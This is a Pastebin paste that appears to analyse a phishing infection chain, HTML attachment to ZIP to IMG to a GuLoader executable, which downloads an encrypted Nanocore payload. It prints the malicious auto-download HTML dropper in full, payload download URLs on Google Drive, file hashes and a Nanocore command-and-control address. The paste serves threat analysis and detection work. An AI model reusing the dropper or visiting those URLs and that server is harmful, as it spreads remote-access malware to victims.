Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Email with file attachment named: #08492.html
- #08492.html --> #08492.zip --> #0844.IMG --> #0844.exe --> SINSINCITY_encrypted_3280000.bin
- #08492.html
- ===========
- <html>
- <head>
- <title>#08492</title>
- <script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
- <script>
- $(function() {
- $('a[data-auto-download]').each(function(){
- var $this = $(this);
- setTimeout(function() {
- window.location = $this.attr('href');
- }, 2000);
- });
- });
- </script>
- </head>
- <body>
- <center><img src="https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe"></center></img>
- <div class="wrapper">
- <p>
- <a data-auto-download href="https://www.sendspace.com/pro/dl/izzu4h"</a>.</p>
- </div>
- </body>
- </html>
- Downloads:
- ==========
- First download:
- psftp.exe (downloaded by first URL - probably legit Putty suite)
- bc59fa5dbb11f5d286fc41e8f25c6cc0
- Second download:
- #08492.zip
- 9bc2cefa6128b6187c0d9cecde5ce608
- Which contains:
- https://www.virustotal.com/gui/file/ac8745e4fee242c12d6692c4c92adaec467f06aa0285e67018ee00dae717d2dd/detection
- #0844.IMG
- 817788f932f5f5015adfff61767fb38f
- Which contains (this should be the GuLoader file):
- https://www.virustotal.com/gui/file/cd840d5ce4befb95f4ee4fdfd2bc312baa6983aebe52a127042dba03a3579576/detection
- #0844.exe
- 6458cae5ef3ffe2de7fdab0c43f49f1c
- Running the .exe downloads:
- https://drive.google.com/uc?export=download&id=1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq
- https://doc-0o-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9eo36211iggnk2iei9m347crmqbo86j9/1584719025000/01552400289149162477/*/1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq?e=download
- Which downloads: (this should be the encoded Nanocore file):
- SINSINCITY_encrypted_3280000.bin
- b9b1e5661689775a1fd2825ad98d36ba
- Nanocore C2:
- 207.246.72.237:8806
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement